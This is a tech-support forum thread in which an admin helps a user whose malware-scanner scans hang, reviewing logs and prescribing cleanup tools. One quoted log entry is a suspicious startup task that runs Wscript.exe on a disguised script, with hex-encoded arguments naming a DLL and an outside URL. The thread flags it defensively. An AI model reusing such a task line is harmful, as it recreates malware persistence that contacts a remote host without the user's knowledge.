Jump to content

Recommended Posts

Over the past few days I have been experiencing a problem with running scans using the Premium edition.  The scan will run and when it enters into the heuristic analysis phase it just keeps on going.  The scan will not cancel through the interface.  I have to use Task Manager to get it to end.

I would appreciate some help with resolving this.

Link to post
Share on other sites

  • Root Admin

Hello @Aidwen and :welcome:

Sorry to hear you're having issues with the program. Let me get some logs please so I can see what might be going on with your system.

 

Please read the following and post back the 3 requested logs as an attachment.
 
Diagnostic Logs
 
Thanks

Ron

Link to post
Share on other sites

  • Root Admin

Why is your Firefox browser using a proxy?

FF NetworkProxy: Mozilla\Firefox\Profiles\ykonl7oq.default -> user_pref("network.proxy.http_port", 8877
FF NetworkProxy: Mozilla\Firefox\Profiles\ykonl7oq.default -> user_pref("network.proxy.type", 1

Nothing wrong in using one, as long as you're aware it's there and you set it on purpose. Often malware adds it so they can control where you go on the Web.

Do you know what this is and what it's doing? It runs each time the computer starts.

Task: {CBD8385F-84BE-4219-BE1C-24178F65B08D} - System32\Tasks\Cassiopesa feta => Wscript.exe "C:\ProgramData\{5109B9CA-018B-684C-B00D-18CE608FCB40}\2.0.1.9\defa.txt" "433a2f50726f6772616d446174612f7b35313039423943412d303138422d363834432d423030442d3138434536303846434234307d2f322e302e312e392f666574612e646c6c" "687474703a2f2f73616f2e63737062696e742e636f6d2f" "--IsErIk" "//E:jscript"

Please read the following article concerning the use of MSCONFIG which is enabled and being used on your system to prevent loading of items.
Msconfig Is Not A Startup Manager
 

You have some errors in the Event Logs that you should try to correct but I don't think they're the issue you're having.

System errors:
=============
Error: (01/15/2017 10:48:57 PM) (Source: Service Control Manager) (EventID: 7011) (User:)
Description: The timeout (30000 milliseconds) was reached while waiting for the transaction response of the MapsBroker service.

Error: (01/15/2017 10:48:13 PM) (Source: Service Control Manager) (EventID: 7011) (User:)
Description: The timeout (30000 milliseconds) was reached while waiting for the transaction response of the MapsBroker service.

Error: (01/15/2017 09:10:44 PM) (Source: DCOM) (EventID: 10010) (User: YAEL-PC)
Description: Server {0134A8B2-3407-4B45-AD25-E9F7C92A80BC} did not register on DCOM before the end of the allotted time.

Error: (01/15/2017 07:52:38 PM) (Source: DCOM) (EventID: 10010) (User: YAEL-PC)
Description: The App.AppXy9rh3t8m2jfpvhhxp6y2ksgeq77vymbq.mca server did not register on DCOM before the time runs out.

Error: (01/15/2017 06:58:40 PM) (Source: DCOM) (EventID: 10016) (User: YAEL-PC)
Description: Application-specific authorization settings do not grant Local Execution permission for the COM server application with the CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
 And APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
 To the SID Yael-PC \ Yael of the user (S-1-5-21-4252424920-993859405-893459337-1000) from the LocalHost address (with LRPC) running in the Unavailable SID of the Application Container (Not available). This security permission can be changed by using the Component Services administrative tool.

Error: (01/15/2017 06:58:40 PM) (Source: DCOM) (EventID: 10016) (User: YAEL-PC)
Description: Application-specific authorization settings do not grant Local Execution permission for the COM server application with the CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
 And APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
 To the SID Yael-PC \ Yael of the user (S-1-5-21-4252424920-993859405-893459337-1000) from the LocalHost address (with LRPC) running in the Unavailable SID of the Application Container (Not available). This security permission can be changed by using the Component Services administrative tool.

Error: (01/15/2017 06:58:40 PM) (Source: DCOM) (EventID: 10016) (User: YAEL-PC)
Description: Application-specific authorization settings do not grant Local Execution permission for the COM server application with the CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
 And APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
 To the SID Yael-PC \ Yael of the user (S-1-5-21-4252424920-993859405-893459337-1000) from the LocalHost address (with LRPC) running in the Unavailable SID of the Application Container (Not available). This security permission can be changed by using the Component Services administrative tool.

Error: (01/15/2017 06:58:40 PM) (Source: DCOM) (EventID: 10016) (User: YAEL-PC)
Description: Application-specific authorization settings do not grant Local Execution permission for the COM server application with the CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
 And APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
 To the SID Yael-PC \ Yael of the user (S-1-5-21-4252424920-993859405-893459337-1000) from the LocalHost address (with LRPC) running in the Unavailable SID of the Application Container (Not available). This security permission can be changed by using the Component Services administrative tool.

(Source: DCOM) (EventID: 10016) (User: YAEL-PC)
Description: Application-specific authorization settings do not grant Local Execution permission for the COM server application with the CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
 And APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
 To the SID Yael-PC \ Yael of the user (S-1-5-21-4252424920-993859405-893459337-1000) from the LocalHost address (with LRPC) running in the Unavailable SID of the Application Container (Not available). This security permission can be changed by using the Component Services administrative tool.

Error: (01/15/2017 06:54:47 PM) (Source: DCOM) (EventID: 10016) (User: YAEL-PC)
Description: Application-specific authorization settings do not grant Local Execution permission for the COM server application with the CLSID
{7022A3B3-D004-4F52-AF11-E9E987FEE25F}
 And APPID
{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}
 To the SID Yael-PC \ Yael of the user (S-1-5-21-4252424920-993859405-893459337-1000) from the LocalHost address (with LRPC) running in the Unavailable SID of the Application Container (Not available). This security permission can be changed by using the Component Services administrative tool.

 

It should not be due to iObit but it is possible as it does monitor and make changes to your system. You're also running a P2P Utorrent client which can put stress on the network card which may possibly add to the issue. In theory or best world case neither one would bother our protection modules, but there is at least a small chance they're part of the issue.

Again, I don't think iObit is the issue, but let me make you aware of previous tactics of this Chinese company and you make the choice if you want to remove permanently or not. I would suggest at least a temporary removal to see if that helps to correct the issue or not.

 

The company behind this product was found to be stealing the MBAM database.
Personally I would not trust installing any software from a company that resorts to stealing someone's technology to sell their product.
Please see the following links and make up your own mind if you want to keep this on your system. If needed, your malware helper can help you remove it.


 

At a minimum, what I'd like you to do right now is uninstall Malwarebytes using the process below. Then restart the computer and test it out and let me know if it's still being an issue or not.


Please uninstall your current version of MBAM and reinstall the latest version using the following guide. MBAM Clean Removal Process 2x


Thanks

Ron

 

 

 

 

Link to post
Share on other sites

Hey ! I wasnt aware of the firefox thing so i deleted it, i reinstaled MBAM like your tutorial, and reinstal it like the tutorial but nothing change, the analyse go on and when heuristic analysis comme, it continue to run again and again without anlysisng anything (Blocked at 615 583 elements analysed then continue)

Can you pleas healp me :-/, MBAM manage to find 23 potential malware and i cannot do anything, sorry to be a noob at this, i hope you will be able to assist me 

Thx a lot 

Link to post
Share on other sites

  • Root Admin

Let me have you run the following

 

 

Please Run TFC by OldTimer to clear temporary files:

  • Download TFC from here and save it to your desktop.
  • http://oldtimer.geekstogo.com/TFC.exe
  • Close any open programs and Internet browsers.
  • Double click TFC.exe to run it on XP (for Vista and Windows 7 right click and choose "Run as administrator") and once it opens click on the Start button on the lower left of the program to allow it to begin cleaning.
  • Please be patient as clearing out temp files may take a while.
  • Once it completes you may be prompted to restart your computer, please do so.
  • Once it's finished you may delete TFC.exe from your desktop or save it for later use for the cleaning of temporary files.

 

Next, run the following full disk check.

Please click on the "Search the web and Windows" box.

win10search.jpg.ab49407705b2ffa8728339ae


Then type in CMD.EXE and when it shows on the start menu right click and select "Run as administrator"

 

cmd_prompt_run_as_administrator.jpg.252a

 

In the command prompt please type the following exactly.

CHKDSK  C:  /R

This will tell Windows to run a full disk check, however you'll get the following, telling you it cannot run because it's in use.

Press the Y key to tell it to run on the next restart of the computer.

 

Quote

Microsoft Windows [Version 10.0.10586]


(c) 2015 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>CHKDSK C: /R
The type of the file system is NTFS.
Cannot lock current drive.

Chkdsk cannot run because the volume is in use by another
process.  Would you like to schedule this volume to be
checked the next time the system restarts? (Y/N)

 

Then restart the computer and let it run.
Then find and copy the disk check entry from the Event Logs and paste back the results here.

How to Read Event Viewer Log for Chkdsk (Check Disk) in Windows 10

 

Then uninstall the iObit software for now and restart the computer. Then start Malwarebytes and scan again and let me know.

 

Link to post
Share on other sites

  • Root Admin

Please visit each of the following sites and let's reset all of your browsers back to defaults to prevent unexpected issues.
If you are not using one of the browsers but it is installed then you may want to consider uninstalling it as older versions of some software can pose an increase in the potential for an infection to get in.

Internet Explorer
How to reset Internet Explorer settings

Firefox
Click on Help / Troubleshooting Information then click on the Reset Firefox button.

Chrome

I would like to reset Chrome back to defaults to completely clear out what is going on with Chrome.

You can keep your “Bookmarks” if you want to keep them, but you have to export them first – >> Export Bookmarks << – Everything else should be removed.

Then I need you to go to >> Google Sync << and sign into your account.
Scroll down until you see the reset sync button and click on the button
At the prompt click on Ok.

.
Reset Your Browser Settings
.

  1. In the top-right corner of the browser window, click the “Chrome Menu” icon (Three horizontal lines)
  2. Select Settings.
  3. At the bottom, click Show advanced settings…
  4. Scroll down until you see “Reset settings”, Then click on the button Reset Settings.
  5. In the dialog that appears, click Reset.

.
Close Chrome and restart it and check it out for me please

Link to post
Share on other sites

  • Root Admin

Please restart the computer first and then run the following steps and post back the logs when ready.

STEP 01
Please download Junkware Removal Tool to your desktop.

  • Shutdown your antivirus to avoid any conflicts.
  • Right click over JRT.exe and select Run as administrator on Windows Vista or Windows 7, double-click on XP.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next reply message
  • When completed make sure to re-enable your antivirus

STEP 02

adwcleaner_new.png Fix with AdwCleaner

Please download AdwCleaner by Xplode and save the file to your Desktop.

  • Right-click on adwcleaner_new.png icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Accept the Terms of use.
  • Wait until the database is updated.
  • Click Scan.
  • When finished, please click Clean.
  • Your PC should reboot now.
  • After reboot, logfile will be opened. Copy its content into your next reply.

Note: Reports will be saved in your system partition, usually at C:\Adwcleaner

STEP 03
Download Sophos Free Virus Removal Tool and save it to your desktop.
 

  • Double click the icon and select Run
  • Click Next
  • Select I accept the terms in this license agreement, then click Next twice
  • Click Install
  • Click Finish to launch the program
  • Once the virus database has been updated click Start Scanning
  • If any threats are found click Details, then View Log file (bottom left-hand corner)
  • Copy and paste the results in your reply
  • Close the Notepad document, close the Threat Details screen, then click Start cleanup
  • Click Exit to close the program
  • If no threats were found, please confirm that result.

STEP 04
Please download the Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. You can check here if you're not sure if your computer is 32-bit or 64-bit

  • Double-click to run it. When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). If you've, run the tool before you need to place a check mark here.
  • Please attach the Additions.txt log to your reply as well.

 

Thanks

Link to post
Share on other sites

  • Root Admin

Wow, very odd there. After running the Disk Check and the Temp cleanup that should have fixed any issues preventing the scan from happening.

I wonder if this is the cause

Error: (01/24/2017 01:57:00 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513)
Description: Encryption services failed when processing the OnIdentity () call in the System Writer object.

 

Please restart the computer 2 times. Then run FRST again and post back both new logs and we'll review if that error is still happening or not.

 

Link to post
Share on other sites

  • Root Admin

 

The one error is gone, but you're still having other errors in the system, including the shell "explorer.exe" crashing.

Please visit the following link and see if running these tools, methods can repair the crashing of Explorer and other errors.

https://answers.microsoft.com/en-us/windows/wiki/windows_10-update/system-file-check-sfc-scan-and-repair-system-files/bc609315-da1f-4775-812c-695b60477a93

 

 

=============== Errors in the Event Log: ================== =

Errors Application:
===============
Error: (01/27/2017 09:09:07 PM) (Source: Application Error) (EventID: 1000) (User:)
Description: Name of the default application Battle.net Helper.exe, version: 0.0.0.0, time-stamp: 0x58810e94
Name of the failing module: libcef.dll, version: 3.2171.98.0, time stamp: 0x57212997
Exception code: 0x80000003
Error offset: 0x014e50d3
Failed process ID: 0x69c
Start time of application failing: 0x01d278d4065781d5
Path of the failing application: C: \ Program Files (x86) \ Battle.net \ Battle.net.8293 \ Battle.net Helper.exe
Path of the failing module: C: \ Program Files (x86) \ Battle.net \ Battle.net.8293 \ libcef.dll
Report ID: 98c2fc68-7254-4865-a295-389beb24822f
Full name of the failing package:
Application ID for the failed package:

Error: (01/27/2017 11:53:51 AM) (Source: Application Error) (EventID: 1000) (User:)
Description: Default application name Explorer.EXE, version: 10.0.14393.479, time stamp: 0x58258a90
Name of the failing module: windows.immersiveshell.serviceprovider.dll, version: 10.0.14393.0, time stamp: 0x57899873
Exception code: 0x80270233
Error offset: 0x0000000000033c25
Failed process ID: 0x6a0
Start time of the application failing: 0x01d2788b97298a90
Failing Application Path: C: \ WINDOWS \ Explorer.EXE
Path of the failing module: C: \ Windows \ System32 \ windows.immersiveshell.serviceprovider.dll
Report ID: 0182044c-ea5a-4d57-b14d-366c273cd327
Full name of the failing package:
Application ID for the failed package:

Error: (01/27/2017 11:52:51 AM) (Source: Application Error) (EventID: 1000) (User:)
Description: Name of application failing nvxdsync.exe, version: 8.17.13.7849, time stamp: 0x58821e88
Name of the failing module: ntdll.dll, version: 10.0.14393.479, time stamp: 0x5825887f
Exception code: 0xc0000005
Error offset: 0x000000000002f5b9
Failed process ID: 0xf40
Start Time of Failed Application: 0x01d2788b71118e7e
Path of the failed application: C: \ Program Files \ NVIDIA Corporation \ Display \ nvxdsync.exe
Path of the failing module: C: \ WINDOWS \ SYSTEM32 \ ntdll.dll
Report ID: 186ec2a2-be1c-43fb-9ee2-ec97533c04c1
Full name of the failing package:
Application ID for the failed package:

Error: (01/27/2017 11:03:55 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: YAEL-PC)
Description: Failed to activate application Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy! App with error: -2144927141 For more information, see the Microsoft-Windows-TWinUI / Operational log.

Error: (01/27/2017 10:24:02 AM) (Source: Application Error) (EventID: 1000) (User:)
Description: Default application name Explorer.EXE, version: 10.0.14393.479, time stamp: 0x58258a90
Name of the failing module: windows.immersiveshell.serviceprovider.dll, version: 10.0.14393.0, time stamp: 0x57899873
Exception code: 0x80270233
Error offset: 0x0000000000033c25
Failed process ID: 0x1604
Start time of the application failing: 0x01d2787eff97742b
Failing Application Path: C: \ WINDOWS \ Explorer.EXE
Path of the failing module: C: \ Windows \ System32 \ windows.immersiveshell.serviceprovider.dll
Report ID: 1d26eb3b-c582-4773-a851-2cfaec858021
Full name of the failing package:
Application ID for the failed package:


System errors:
=============
Error: (01/27/2017 09:14:59 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: Application-specific authorization settings do not grant Local Activation permission for the COM server application with the CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
 And APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
 To the SID AUTHORITY NT \ User's System (S-1-5-18) from the LocalHost Address (with LRPC) running in the Unavailable SID of the Application Container (Not Available). This security permission can be changed by using the Component Services administrative tool.

Error: (01/27/2017 09:14:15 PM) (Source: Service Control Manager) (EventID: 7000) (User:)
Description: The SDScannerService service failed to start because of the error:
The service did not respond fairly quickly to the launch or control request.

Error: (01/27/2017 09:14:15 PM) (Source: Service Control Manager) (EventID: 7009) (User:)
Description: The timeout (30000 milliseconds) was reached when the SDScannerService service was waited for.

Error: (01/27/2017 09:14:12 PM) (Source: Service Control Manager) (EventID: 7000) (User:)
Description: The SDUpdateService service could not start due to the error:
The service did not respond fairly quickly to the demand for launches

 

 

 

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.